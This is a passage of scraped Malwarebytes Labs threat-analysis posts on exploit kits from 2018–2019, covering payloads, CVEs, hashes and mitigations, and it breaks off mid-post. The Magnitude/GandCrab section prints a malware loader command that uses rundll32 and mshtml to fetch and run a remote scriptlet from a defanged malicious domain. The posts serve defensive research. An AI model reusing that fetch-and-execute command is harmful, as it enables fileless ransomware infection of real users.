Indeed, shortly after our [summer review](<https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/>), a new exploit kit was discovered, and while no new vulnerabilities were added to the current EKs, several malvertising chains are still going strong.\n\n[Smoke Loader](<https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/>), [Ramnit](<https://blog.malwarebytes.com/detections/worm-ramnit/>), and AZORult are some of the most common payloads we've observed in the last few months\u2014particularly in Japan and Canada. The geo-targeted exploit kits such as Magnitude EK continue to predominantly affect South Korea and Taiwan.\n\nAnother interesting trend as of late is a decrease in [cryptomining](<https://blog.malwarebytes.com/glossary/cryptomining/>) payloads and an increase in ransomware drops instead, mostly via the Fallout and RIG EKs.\n\n### Fall 2018 EK overview\n\n * Fallout EK\n * RIG EK\n * GrandSoft EK\n * Magnitude EK\n * Underminer EK\n\nInternet Explorer\u2019s [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash\u2019s [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) continue to be the most relied upon vulnerabilities.\n\n### Fallout EK\n\nFallout EK, [discovered by team nao_sec](<https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html>), is the newest exploit kit which takes its name and URI patterns from the defunct Nuclear EK. Fallout EK has diverse campaigns that are not limited to a particular geographic location and therefore could be seen as a direct rival to RIG EK. Due to its constantly changing and complex URI paths, Fallout EK stands out from its counterparts.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/10/FalloutEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/FalloutEK.png> \"\" )\n\nThe payload in this sequence is [GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>).\n \n \n 229BD13628C1AE3E84A9C7860617B836ACCDE4D932D2A2DC9DB64E78C211DA41\n\n### RIG EK\n\nNot much has changed with RIG EK in recent times, but since the arrival of its new competitor, Fallout EK, our telemetry shows its usage has slowly declined in the past quarter.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/10/RIGEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/RIGEK.png> \"\" )\n\nThe payload in this sequence is Kraken ransomware.\n \n \n 2F5DEC0A8E1DA5F23B818D48EFB0B9B7065023D67C617A78CD8B14808A79C0DC\n\n### GrandSoft EK\n\nGrandSoft EK is a little less common than the other EKs that we track. Some of its delivery chains include compromised websites acting as an intermediary gate. Thanks to team nao_sec for sharing some recent traffic.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/10/GrandSoftEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/GrandSoftEK.png> \"\" )\n\nThe payload in this sequence is the Ramnit banker.\n \n \n 6FDA89FBB9FD66EE929665E376077E07C1BD2AF2D91C63148A7F5E818E4D27B2\n\n### Magnitude EK\n\nMagnitude EK continues to faithfully deliver its own brand of ransomware to targeted countries, such as South Korea. and Taiwan. It is one of the rare exploit kits that uses a truly fileless payload, which makes its extraction to disk a challenge.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/10/MagnitudeEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/MagnitudeEK.png> \"\" )\n\nThe payload in this sequence is Magniber ransomware (extracted with [@hasherezade](<https://twitter.com/hasherezade>)'s [hollows_hunter](<https://github.com/hasherezade/hollows_hunter>)).\n \n \n F229AE5F68C72E678D4D706CE84ABFCCC983A299E39BEBCD990AECE7E3F97D71\n\n### Underminer EK\n\nWe spotted Underminer EK a few times during the past quarter. This exploit kit is unique because its payload delivery, a bootkit, is vastly different from any other EK.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/10/UnderminerEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/UnderminerEK.png> \"\" )\n\nThe payload in this sequence is a bootkit infector.\n\n### Mitigation\n\nAs always, it is important to keep systems up-to-date and reduce the attack surface whenever possible. The current vulnerabilities used by the above exploit kits have already been patched by their respective vendors.\n\nMalwarebytes' [application hardening protection layer](<https://www.malwarebytes.com/business/endpointprotectionandresponse/?utm_source=digital&utm_medium=blog&utm_campaign=q3fy19>) blocks these EKs before they even get a chance to drop their payloads.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/10/EKs_fall_2018.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/EKs_fall_2018.gif> \"\" )\n\n### Extended shelf life\n\nThe recent addition of Fallout EK has given exploit kits yet another extension on their otherwise limited shelf life by tapping into existing and new malvertising campaigns with a wider geographic focus.\n\nAs 2019 comes closer, Internet Explorer is still offering opportunities for newer exploits yet to be weaponized, but we could see other browsers such as Edge gain some attention as well.\n\nThe post [Exploit kits: fall 2018 review](<https://blog.malwarebytes.com/threat-analysis/2018/10/exploit-kits-fall-2018-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-24T16:10:54", "type": "malwarebytes", "title": "Exploit kits: fall 2018 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-10-24T16:10:54", "id": "MALWAREBYTES:F79B9F46F986F9BDA455EEBF8E2CA464", "href": "https://blog.malwarebytes.com/threat-analysis/2018/10/exploit-kits-fall-2018-review/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-07T16:58:39", "description": "The uptick trend in cybercriminals using exploit kits that we first noticed in our [spring 2018 report](<https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-review/>) has continued into the summer. Indeed, not only have new kits been found, but older ones are still showing signs of life. This has made the summer quarter one of the busiest we've seen for exploits in a while.\n\nPerhaps one caveat is that, apart from the RIG and GrandSoft exploit kits, we observe the majority of EK activity contained in Asia, maybe due to a greater likelihood of encountering vulnerable systems in that region. Malware distributors have complained that \"loads\" for the North American or European markets are too low via exploit kit, but other areas are still worthy targets.\n\nIn addition, we have witnessed many smaller and unsophisticated attackers using one or two exploits bluntly embedded in compromised websites. In this era of widely-shared exploit proof-of-concepts (PoCs), we are starting to see an increase in what we call \"pseudo-exploit kits.\" These are drive-by downloads that lack proper infrastructure and are typically the work of a lone author.\n\nIn this post, we will review the following exploit kits:\n\n * RIG EK\n * GrandSoft EK\n * Magnitude EK\n * GreenFlash Sundown EK\n * KaiXin EK\n * Underminer EK\n * Pseudo-EKs\n\n### CVEs\n\nTwo newly found vulnerabilities in 2018, Internet Explorer's [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash's [CVE-2018-4878,](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) have been widely adopted and represent the only real attack surface at play. Nevertheless, some kits are still using older exploits in technologies that are being retired, and most likely with little efficacy.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/EKs_CVEs.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/EKs_CVEs.png> \"\" )\n\n### RIG EK\n\nRIG EK remains quite active in malvertising campaigns and compromised websites, and is one of the few exploit kits with a wider geographic presence. It is pictured below in what we call the HookAds campaign, delivering the AZORult stealer.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/RIG_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/RIG_EK.png> \"\" )\n\n### GrandSoft EK\n\nGrandSoft is probably the second most active exploit kit with a backend infrastructure that is fairly static in comparison to RIG. Interestingly, both EKs can sometimes be seen sharing the same distribution campaigns, as pictured below:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/GrandSoft_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/GrandSoft_EK.png> \"\" )\n\n### Magnitude EK\n\nMagnitude, the South Korean\u2013focused EK, keeps delivering its own strain of ransomware (Magniber). We [documented changes](<https://blog.malwarebytes.com/threat-analysis/2018/07/magniber-ransomware-improves-expands-within-asia/>) in Magniber in recent weeks with some code improvements, as well as a wider casting net among several Asian countries.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/Magnitude_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Magnitude_EK.png> \"\" )\n\n### GreenFlash Sundown EK\n\nA sophisticated but more elusive EK focusing on Flash's [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>), GreenFlash Sundown is still active in parts of Asia thanks to a network of compromised OpenX ad servers. We haven't seen any major changes since the last time we profiled it, and it is [still distributing the Hermes ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/GreenFlash_Sundown_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/GreenFlash_Sundown_EK.png> \"\" )\n\n### KaiXin EK\n\nKaiXin EK (also known as CK VIP) is an [older exploit kit](<http://www.kahusecurity.com/2012/08/new-chinese-exploit-pack/>) of Chinese origin, which has maintained its activity over the years. It is unique for the fact that it uses a combination of old (Java) and new vulnerabilities. When we captured it, we noted that it pushed the Gh0st RAT (Remote Access Trojan).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/KaiXin_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/KaiXin_EK.png> \"\" )\n\n### Underminer EK\n\nAlthough this exploit kit was only identified and named recently, it has [been around since at least November 2017](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>) (perhaps with only limited distribution to the Chinese market). It is an interesting EK from a technical perspective with, for example, the use of encryption to package its exploit and prevent offline replays using traffic captures.\n\nAnother out-of-the-ordinary aspect of Underminer is its payload, which isn't a packaged binary like others, but rather a set of libraries that install a bootkit on the compromised system. By altering the device's Master Boot Record, this threat can launch a cryptominer every time the machine reboots.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/Underminer_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Underminer_EK.png> \"\" )\n\n### Pseudo-EKs\n\nMany exploit packs have leaked and been poached over the years, notwithstanding the availability of a large number of other dumps (i.e. HackingTeam) or proofs-of-concept. As a result, it is not surprising to see many less-skilled actors putting together their own \"pseudo-exploit kits.\" They are a far cry from being an EK\u2014they are usually static in nature, their copy/paste exploits are buggy, and consequently, they are only used by the same threat actor in limited distribution. The pseudo-exploit we picture below (offensive domain name has been blurred) is one of the better ones we saw in July, in particular for its use of CVE-2018-8174.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/Pseudo-EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Pseudo-EK.png> \"\" )\n\n### Mitigation\n\nWe are continuously checking drive-by download attacks against our software. This time around, we had a more extensive test bed thanks to new and old exploit kits making it into this summer edition. Malwarebytes continues to block exploit kits with different layers of technology to protect our customers.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/Summer_EKs_replay.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/Summer_EKs_replay.gif> \"\" )\n\n### Don't call it a comeback\n\nIt seems as though talking about the demise of exploit kits triggered an opposite reaction. Certainly, some digging is required to encounter the more obscure or geo-focused toolkits, but this revival of sorts continues thanks to Internet Explorer's\u2014and to a lesser extent Flash's\u2014newly found vulnerabilities.\n\nWhile IE has a small and decreasing global market share ([7 percent](<http://gs.statcounter.com/browser-market-share/desktop/worldwide/#monthly-201707-201807>)), it still has an important presence in countries like South Korea ([31 percent](<http://gs.statcounter.com/browser-market-share/desktop/south-korea/#monthly-201707-201807>)) or Japan ([18 percent](<http://gs.statcounter.com/browser-market-share/desktop/japan/#monthly-201707-201807>)), which could explain why there is still notable activity in a few select regions.\n\nExploit kits, even in a reduced and less impactful form, are likely to stick around for a while, at least for as long as people use a browser that wants to latch on indefinitely.\n\nThe post [Exploit kits: summer 2018 review](<https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-07T15:00:00", "type": "malwarebytes", "title": "Exploit kits: summer 2018 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-08-07T15:00:00", "id": "MALWAREBYTES:C982F670DC06D05621493C9E9A1E0E14", "href": "https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-29T17:51:50", "description": "In the past, we used to do a [blog series](<https://blog.malwarebytes.com/threat-analysis/2016/02/top-exploit-kits-round-up-january-edition/>) on exploit kits where we would periodically check in on the main players in the market. In March 2017, we wrote the [Winter 2017 review,](<https://blog.malwarebytes.com/threat-analysis/2017/03/exploit-kits-winter-2017-review/>) before exploit kit activity dropped down to a whisper. We've since discontinued our blog series, for lack of developments.\n\nA year later, however, exploit kits are showing signs of life. An uptick in campaigns and the sharpshooter-like targeting of a single country make exploits once again worth writing about.\n\n### Overview\n\nRIG EK still remains the most common exploit kit used by different actors in a diverse set of malvertising campaigns. We haven't observed [Terror EK since Fall 2017](<https://blog.malwarebytes.com/threat-analysis/2017/11/terror-exploit-kit-goes-https-all-the-way/>), but another older kit has made a comeback. And even though it remains largely unsophisticated, GrandSoft EK has maintained its activity.\n\nWhile we aren't seeing Sundown EK anymore, a spin-off named GreenFlash Sundown was the first (and only so far) to leverage a new Flash Player zero-day and distribute ransomware. Magnitude EK is the other exploit kit also consistently dropping its own Magniber ransomware.\n\nToday's exploit kits rely on Internet Explorer and Flash Player vulnerabilities for exploitation. We found it particularly interesting that many of those exploit kits are targeting South Korea specifically.\n\nCoincidentally or not, both [CVE-2016-0189](<http://www.zdnet.com/article/south-korea-victim-of-internet-explorer-zero-day-vulnerability/>) (IE) and [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash) were both first used in targeted zero-day attacks against South Korea before they were added into EKs.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/CVEs.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/CVEs.png> \"\" )\n\n### RIG-v EK\n\nRIG EK is by far the most popular exploit kit these days, with many different distribution campaigns and, as a result, the most diverse payloads ([banking Trojans](<http://malware-traffic-analysis.net/2018/03/05/index2.html>), [coin miners](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-rig-malvertising-campaign-uses-cryptocurrency-theme-decoy/>), and [ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>), to name a few).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/RIGEK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/RIGEK.png> \"\" )\n\n### GrandSoft EK\n\nGrandSoft is an older exploit kit that, for a strange reason, decided to make a comeback. Its code is simplistic and decipherable, and it uses rotating hostnames all housed on the same server (62.109.4[.]135). GrandSoft was used to [distribute the GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/>) in late January, but has also been observed dropping [AZORult stealer](<http://malware-traffic-analysis.net/2018/03/15/index3.html>), [QuantLoader](<https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/>), and of course, [miners](<https://traffic.moe/2018/02/09/index.html>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/GrandSoft_EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/GrandSoft_EK.png> \"\" )\n\n### GreenFlash Sundown\n\nGreenFlash Sundown is an interesting exploit kit that uses URI patterns that are almost impossible to match without causing false positives. It makes heavy use of the Flash Player to hide its redirections and malicious calls rather than relying on typical HTML/JS. Beyond this stealth feature, it is also the first exploit kit to integrate a newly-found Flash Player zero-day to [target South Koreans with the Hermes ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>).\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/GreenFlash_Sundown_EK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/GreenFlash_Sundown_EK_.png> \"\" )\n\n### Magnitude EK\n\nMagnitude is a long-standing exploit kit that for some time now has been exclusively focusing on South Korea. Contrary to GreenFlash Sundown, it has dropped all support for the Flash Player and only relies on Internet Explorer for exploitation. Magnitude comes with its very own payload, [Magniber](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>), a piece of ransomware that once again only targets South Korea.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/Magnitude__EK.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/Magnitude__EK.png> \"\" )\n\n### Mitigation\n\nWe ran all these exploit kits in our lab using Internet Explorer 10 and two different versions of the Flash Player. For GreenFlash Sundown, we updated our version of Flash to 28.0.0.137 to trigger the newest zero-day. [Malwarebytes](<https://www.malwarebytes.com/>) stopped all these exploit attempts before any payload had a chance to be dropped or executed.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/03/Anti-Exploit_EKs.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/03/Anti-Exploit_EKs.gif> \"\" )\n\n### Summary\n\nWhile exploit kits are struggling to stay relevant in a browser market share dominated by Google Chrome and a rapid decline in Flash Player usage, we have noted that several different actors are still engaged in distribution via multiple malvertising chains. Some of these actors have taken over tools once used in broader campaigns to distribute their own payload and narrow down their targets to a single country.\n\nEven though exploit kits have not evolved much in terms of firepower, the traffic distribution systems and gates leading to them remain active and diverse. For this reason, threat actors often mix traffic-based on user-agent information to divert victims toward exploit kits or social engineering\u2013based attacks, if the former is not deemed to be a viable option.\n\n### Acknowledgment\n\nThanks to [@nao_sec](<https://twitter.com/nao_sec>) for additional information about GrandSoft EK.\n\nThe post [Exploit kits: Winter 2018 review](<https://blog.malwarebytes.com/threat-analysis/2018/03/exploit-kits-winter-2018-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T15:00:00", "type": "malwarebytes", "title": "Exploit kits: Winter 2018 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2018-4878"], "modified": "2018-03-29T15:00:00", "href": "https://blog.malwarebytes.com/threat-analysis/2018/03/exploit-kits-winter-2018-review/", "id": "MALWAREBYTES:06D9BFC6DC339FACFCE028EB1C5A79EF", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-17T18:23:21", "description": "The GandCrab ransomware is reaching far and wide via [malspam](<https://twitter.com/executemalware/status/986070506351755264>), [social engineering schemes](<https://twitter.com/nao_sec/status/984099138445852672>), and [exploit kit campaigns](<https://twitter.com/malware_traffic/status/985258567291883521>). On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.\n\nWhile Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from [Magniber](<https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/>), which was extremely thorough at avoiding other geolocations.\n\nMagnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. The variations of this technique have been [known for several years](<http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3377>) and used by other families such as by Poweliks, but they are a new addition to Magnitude.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/04/Mag_Crab.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/Mag_Crab.png> \"\" )\n\n_Figure 1: Magnitude EK traffic capture with the GandCrab payload_\n\nMagnitude has always experimented with unconventional ways to load its malware, for example via [binary padding](<https://blog.malwarebytes.com/threat-analysis/2017/08/cerber-ransomware-delivered-format-different-order-magnitude/>), or more recently via [another technique](<https://twitter.com/kafeine/status/980505556715786242>), but still exposing it \"in the clear\" from traffic or network packet capture.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/04/WSH_injection_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/WSH_injection_.png> \"\" )\n\n_Figure 2: Magnitude EK dropping Magniber on April 4, 2018_\n\nThe payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.\n \n \n \"C:\\Windows\\System32\\rundll32.exe\" javascript:\"\\..\\mshtml,RunHTMLApplication \";\n document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/04/encoded_payload.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/encoded_payload.png> \"\" )\n\n_Figure 3: Innocuous scriptlet hides the payload_\n\nAfter the payload is injected into _explorer.exe_, it immediately attempts to reboot the machine. If we suspend that process and use [@hasherezade](<https://twitter.com/hasherezade>)'s [PE-Sieve](<https://github.com/hasherezade/pe-sieve>), we can actually dump the GandCrab DLL from memory:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/04/Dumped_payload.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/Dumped_payload.png> \"\" )\n\n_Figure 4: Extracting the payload from memory using PE-Sieve_\n\nUpon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/04/note.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/04/note.png> \"\" )\n\n_Figure 5: GandCrab's ransom note_\n\nA recent [law enforcement operation](<https://www.europol.europa.eu/newsroom/news/free-data-recovery-kit-for-victims-of-gandcrab-ransomware-now-available-no-more-ransom>) provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.\n\nTime will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.\n\n### Indicators of compromise\n\nDumped GandCrab DLL\n \n \n 9daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a\n\nThe post [Magnitude exploit kit switches to GandCrab ransomware](<https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-17T16:58:26", "type": "malwarebytes", "title": "Magnitude exploit kit switches to GandCrab ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2018-4878"], "modified": "2018-04-17T16:58:26", "id": "MALWAREBYTES:EA93E4D6EB6BD6A0F2388E0DF2AE2D16", "href": "https://blog.malwarebytes.com/threat-analysis/2018/04/magnitude-exploit-kit-switches-gandcrab-ransomware/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-19T20:22:54", "description": "Despite a slim browser market share, Internet Explorer is still being exploited in fall 2019 in a number of drive-by download campaigns. Perhaps even more surprising, we're seeing new exploit kits emerge.\n\nBased on our telemetry, these drive-bys are happening worldwide (with the exception of a few that are geo-targeted) and are fueled by malvertising most often found on adult websites.\n\nEven though the weaponized vulnerabilities remain fairly old, we've observed a growing number of exploit kits go for [fileless attacks](<https://blog.malwarebytes.com/cybercrime/2016/03/fileless-infections-an-overview/>) instead of the more traditional method of dropping a payload on disk. This is an interesting trend that makes sample sharing more difficult and possibly increases infection rates by evading some security products.\n\n### Fall 2019 overview\n\n * Spelevo EK\n * Fallout EK\n * Magnitude EK\n * RIG EK\n * GrandSoft EK\n * Underminer EK\n * KaiXin EK\n * Purplefox EK\n * Capesand EK\n\n### Vulnerabilties\n\nInternet Explorer\u2019s [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash Player\u2019s [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>) are the most common vulnerabilities, while the older[ CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash) is still used by some EKs. It's worth noting we're seeing some exploit kits no longer using Flash, while others are relying on much older vulnerabilities.\n\n### Spelevo EK\n\nSpelevo EK is one of these newer exploit kits that we see on a regular basis via malvertising campaigns. There hasn't been any major change since [our last review](<https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/>) and the threat actors still rely on the domain shadowing technique to generate new URLs. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2019/11/spelevoEK_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2019/11/spelevoEK_.png> \"\" )\n\n**Payloads seen**: PsiXBot, Gootkit, Maze\n\n### Fallout EK\n\nFallout EK stands apart from the rest with obfuscation techniques, as well various fingerprinting checks. It also implemented the 